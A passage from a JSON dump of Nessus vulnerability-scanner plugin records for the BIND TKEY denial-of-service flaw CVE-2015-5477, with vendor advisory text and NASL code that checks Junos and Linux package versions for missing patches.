An unauthenticated, remote attacker can exploit this, via crafted TKEY queries, to cause an REQUIRE assertion failure and daemon exit.", "cvss3": {"score": null, "vector": null}, "published": "2016-01-22T00:00:00", "type": "nessus", "title": "Juniper Junos TKEY Query Handling DoS (JSA10718)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2019-04-11T00:00:00", "cpe": ["cpe:/o:juniper:junos"], "id": "JUNIPER_JSA10718.NASL", "href": "https://www.tenable.com/plugins/nessus/88093", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(88093);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2019/04/11\");\n\n script_cve_id(\"CVE-2015-5477\");\n script_bugtraq_id(76092);\n script_xref(name:\"JSA\", value:\"JSA10718\");\n script_xref(name:\"EDB-ID\", value:\"37721\");\n script_xref(name:\"EDB-ID\", 
value:\"37723\");\n\n script_name(english:\"Juniper Junos TKEY Query Handling DoS (JSA10718)\");\n script_summary(english:\"Checks the Junos version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the remote Juniper\nJunos device is affected by a denial of service vulnerability due to\na flaw in ISC BIND when handling queries for TKEY records. An\nunauthenticated, remote attacker can exploit this, via crafted TKEY\nqueries, to cause an REQUIRE assertion failure and daemon exit.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10718\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant Junos software release referenced in Juniper\nadvisory JSA10718.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:juniper:junos\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Junos Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"junos_version.nasl\");\n script_require_keys(\"Host/Juniper/JUNOS/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"junos_kb_cmd_func.inc\");\ninclude(\"misc_func.inc\");\n\nver = get_kb_item_or_exit('Host/Juniper/JUNOS/Version');\nmodel = get_kb_item_or_exit('Host/Juniper/model');\nfixes = make_array();\n\nfixes['12.1X44'] = '12.1X44-D55';\nfixes['12.1X46'] = '12.1X46-D40'; # or 12.1X46-D45\nfixes['12.1X47'] = '12.1X47-D30';\nfixes['12.3' ] = '12.3R11'; # or 12.3R12\nfixes['12.3X48'] = '12.3X48-D20';\nfixes['12.3X50'] = '12.3X50-D50';\nfixes['13.2' ] = '13.2R9';\nfixes['13.2X51'] = '13.2X51-D40';\nfixes['13.3' ] = '13.3R8';\nfixes['14.1' ] = '14.1R6'; # or 14.1R7\nfixes['14.1X53'] = '14.1X53-D30';\nfixes['14.2' ] = '14.2R5';\nfixes['15.1R' ] = '15.1R5'; # or 15.1R3\nfixes['15.1F' ] = '15.1F3';\nfixes['15.1X49'] = '15.1X49-D30';\nfixes['15.1X53'] = '15.1X53-D20';\nfixes['15.2R' ] = '15.2R1';\n\ncheck_model(model:model, flags:J_SERIES | SRX_SERIES, exit_on_fail:TRUE);\n\nfix = check_junos(ver:ver, fixes:fixes, exit_on_fail:TRUE);\n\nif (fix == \"15.1R5\")\n fix += \" or 15.1R3\";\nif (fix == \"14.1R6\")\n fix += \" or 14.1R7\";\nif (fix == \"12.3R11\")\n fix += \" or 12.3R12\";\nif (fix == \"12.1X46-D40\")\n fix += \" or 12.1X46-D45\";\n\noverride = TRUE;\nbuf = junos_command_kb_item(cmd:\"show configuration | display set\");\nif (buf)\n{\n pattern = \"^set system services dns dns-proxy\";\n if (!junos_check_config(buf:buf, pattern:pattern))\n audit(AUDIT_HOST_NOT, 'affected because proxy-dns settings have not been configured');\n override = FALSE;\n}\n\n\njunos_report(ver:ver, fix:fix, model:model, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:05:16", "description": "Update to 9.9.7-P2 to fix CVE-2015-5477\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora 
security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2015-08-03T00:00:00", "type": "nessus", "title": "Fedora 22 : bind99-9.9.7-6.P2.fc22 (2015-12316)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:bind99", "cpe:/o:fedoraproject:fedora:22"], "id": "FEDORA_2015-12316.NASL", "href": "https://www.tenable.com/plugins/nessus/85169", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-12316.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85169);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-5477\");\n script_xref(name:\"FEDORA\", value:\"2015-12316\");\n\n script_name(english:\"Fedora 22 : bind99-9.9.7-6.P2.fc22 (2015-12316)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to 9.9.7-P2 to fix CVE-2015-5477\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1247361\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-August/163015.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?45265ef6\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected bind99 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind99\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: 
\"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"bind99-9.9.7-6.P2.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind99\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:04:28", "description": "Updated bind packages that fix one security issue are now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource records. A remote attacker could use this flaw to make named (functioning as an authoritative DNS server or a DNS resolver) exit unexpectedly with an assertion failure via a specially crafted DNS request packet. 
(CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream acknowledges Jonathan Foote as the original reporter.\n\nAll bind users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. After installing the update, the BIND daemon (named) will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2015-07-29T00:00:00", "type": "nessus", "title": "CentOS 5 : bind (CESA-2015:1514)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:bind", "p-cpe:/a:centos:centos:bind-chroot", "p-cpe:/a:centos:centos:bind-devel", "p-cpe:/a:centos:centos:bind-libbind-devel", "p-cpe:/a:centos:centos:bind-libs", "p-cpe:/a:centos:centos:bind-sdb", "p-cpe:/a:centos:centos:bind-utils", "p-cpe:/a:centos:centos:caching-nameserver", "cpe:/o:centos:centos:5"], "id": "CENTOS_RHSA-2015-1514.NASL", "href": "https://www.tenable.com/plugins/nessus/85048", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:1514 and \n# CentOS Errata and Security Advisory 2015:1514 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85048);\n script_version(\"2.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2015-5477\");\n script_xref(name:\"RHSA\", value:\"2015:1514\");\n\n script_name(english:\"CentOS 5 : bind (CESA-2015:1514)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated bind packages that fix one security 
issue are now available\nfor Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the\nDomain Name System (DNS) protocols. BIND includes a DNS server\n(named); a resolver library (routines for applications to use when\ninterfacing with DNS); and tools for verifying that the DNS server is\noperating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS\nresource records. A remote attacker could use this flaw to make named\n(functioning as an authoritative DNS server or a DNS resolver) exit\nunexpectedly with an assertion failure via a specially crafted DNS\nrequest packet. (CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. 
After installing the\nupdate, the BIND daemon (named) will be restarted automatically.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2015-July/021270.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4fb19e40\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bind packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-5477\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bind-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bind-libbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bind-sdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:caching-nameserver\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"generated_plugin\", 
value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"bind-9.3.6-25.P1.el5_11.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"bind-chroot-9.3.6-25.P1.el5_11.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"bind-devel-9.3.6-25.P1.el5_11.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"bind-libbind-devel-9.3.6-25.P1.el5_11.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"bind-libs-9.3.6-25.P1.el5_11.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"bind-sdb-9.3.6-25.P1.el5_11.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"bind-utils-9.3.6-25.P1.el5_11.3\")) flag++;\nif 
(rpm_check(release:\"CentOS-5\", reference:\"caching-nameserver-9.3.6-25.P1.el5_11.3\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind / bind-chroot / bind-devel / bind-libbind-devel / bind-libs / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:04:29", "description": "As reported upstream, an error in the handling of TKEY queries can be exploited by an attacker for use as a denial-of-service vector, as a constructed packet can use the defect to trigger a REQUIRE assertion failure, causing BIND to exit.", "cvss3": {"score": null, "vector": null}, "published": "2015-07-29T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : bind (ALAS-2015-573)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2018-12-18T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:bind", "p-cpe:/a:amazon:linux:bind-chroot", "p-cpe:/a:amazon:linux:bind-debuginfo", "p-cpe:/a:amazon:linux:bind-devel", "p-cpe:/a:amazon:linux:bind-libs", "p-cpe:/a:amazon:linux:bind-sdb", "p-cpe:/a:amazon:linux:bind-utils", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2015-573.NASL", "href": "https://www.tenable.com/plugins/nessus/85044", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2015-573.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85044);\n script_version(\"2.10\");\n script_cvs_date(\"Date: 2018/12/18 10:18:58\");\n\n script_cve_id(\"CVE-2015-5477\");\n script_xref(name:\"ALAS\", value:\"2015-573\");\n\n script_name(english:\"Amazon Linux AMI : bind (ALAS-2015-573)\");\n script_summary(english:\"Checks rpm output for the updated 
packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"As reported upstream, an error in the handling of TKEY queries can be\nexploited by an attacker for use as a denial-of-service vector, as a\nconstructed packet can use the defect to trigger a REQUIRE assertion\nfailure, causing BIND to exit.\"\n );\n # https://kb.isc.org/article/AA-01272/0\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://kb.isc.org/docs/aa-01272\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2015-573.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update bind' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:bind-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:bind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:bind-sdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/28\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"bind-9.8.2-0.30.rc1.38.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"bind-chroot-9.8.2-0.30.rc1.38.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"bind-debuginfo-9.8.2-0.30.rc1.38.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"bind-devel-9.8.2-0.30.rc1.38.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"bind-libs-9.8.2-0.30.rc1.38.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"bind-sdb-9.8.2-0.30.rc1.38.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"bind-utils-9.8.2-0.30.rc1.38.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n 
exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind / bind-chroot / bind-debuginfo / bind-devel / bind-libs / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:04:35", "description": "Updated bind97 packages that fix one security issue are now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource records. A remote attacker could use this flaw to make named (functioning as an authoritative DNS server or a DNS resolver) exit unexpectedly with an assertion failure via a specially crafted DNS request packet. (CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream acknowledges Jonathan Foote as the original reporter.\n\nAll bind97 users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. 
After installing the update, the BIND daemon (named) will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2015-07-29T00:00:00", "type": "nessus", "title": "CentOS 5 : bind97 (CESA-2015:1515)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:bind97", "p-cpe:/a:centos:centos:bind97-chroot", "p-cpe:/a:centos:centos:bind97-devel", "p-cpe:/a:centos:centos:bind97-libs", "p-cpe:/a:centos:centos:bind97-utils", "cpe:/o:centos:centos:5"], "id": "CENTOS_RHSA-2015-1515.NASL", "href": "https://www.tenable.com/plugins/nessus/85049", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:1515 and \n# CentOS Errata and Security Advisory 2015:1515 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85049);\n script_version(\"2.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2015-5477\");\n script_xref(name:\"RHSA\", value:\"2015:1515\");\n\n script_name(english:\"CentOS 5 : bind97 (CESA-2015:1515)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated bind97 packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. 
A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the\nDomain Name System (DNS) protocols. BIND includes a DNS server\n(named); a resolver library (routines for applications to use when\ninterfacing with DNS); and tools for verifying that the DNS server is\noperating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS\nresource records. A remote attacker could use this flaw to make named\n(functioning as an authoritative DNS server or a DNS resolver) exit\nunexpectedly with an assertion failure via a specially crafted DNS\nrequest packet. (CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind97 users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. 
After\ninstalling the update, the BIND daemon (named) will be restarted\nautomatically.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2015-July/021269.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?77375277\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected bind97 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-5477\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bind97\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bind97-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bind97-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bind97-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bind97-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. 
